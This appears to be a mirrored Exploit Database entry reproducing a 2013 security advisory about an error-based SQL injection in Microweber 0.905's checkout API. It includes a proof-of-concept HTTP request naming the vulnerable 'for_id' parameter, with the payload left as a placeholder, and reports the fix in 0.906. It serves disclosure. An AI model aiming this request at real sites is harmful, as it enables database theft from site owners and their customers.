Microweber 0.905 – Error-Based SQL Injection

• Exploit Database
• 122 阅读

• 作者： Zy0d0x
  日期： 2013-11-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29476/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97

  =============================================================================== | | ____ _ __ _____ __/ / /__ ___ ______ ______(_) /___ __ / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / /___/ team   PUBLIC SECURITY ADVISORY | | ===============================================================================     TITLE =====   Microweber Error Based SQL Injection   AUTHOR ======   Zy0d0x     DATE ====   06/11/2013   VENDOR ======   http://microweber.com/   AFFECTED PRODUCT ================   Microweber v0.905     DESCRIPTION ===========   Input passed via the "for_id" parameter is not properly sanitised before being processed. This can be exploited to extract sensitive information from the database(s).   PROOF OF CONCEPT ================     POST /microweber/api/checkout HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/microweber/checkout Content-Length: 352 Cookie: last_page=checkout; mw-time3830699257=2013-11-06+10%3A11%3A31; helpinfo=false; PHPSESSID=rtip13vkbp1jrsij39ab4isui4 Pragma: no-cache Cache-Control: no-cache   =1&country=&first_name=test&last_name=test&email=test&phone=test&shipping_gw=shop%2Fshipping%2Fgateways%2Fcountry&for_id=shipping-info-checkout557478767[SQLI HERE]&for=module&City=test&State=test&Zip=test&Street=test&payment_gw=shop%2Fpayments%2Fgateways%2Fpaypal     IMPACT ======   Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.     THREAT LEVEL ============   Critical     STATUS ======   Fixed update to version 0.906     DISCLAIMER ==========   nullsecurity.net hereby emphasize, that the information which is published here are for education purposes only. nullsecurity.net does not take any responsibility for any abuse or misusage!   Copyright (c) 2011 - nullsecurity.net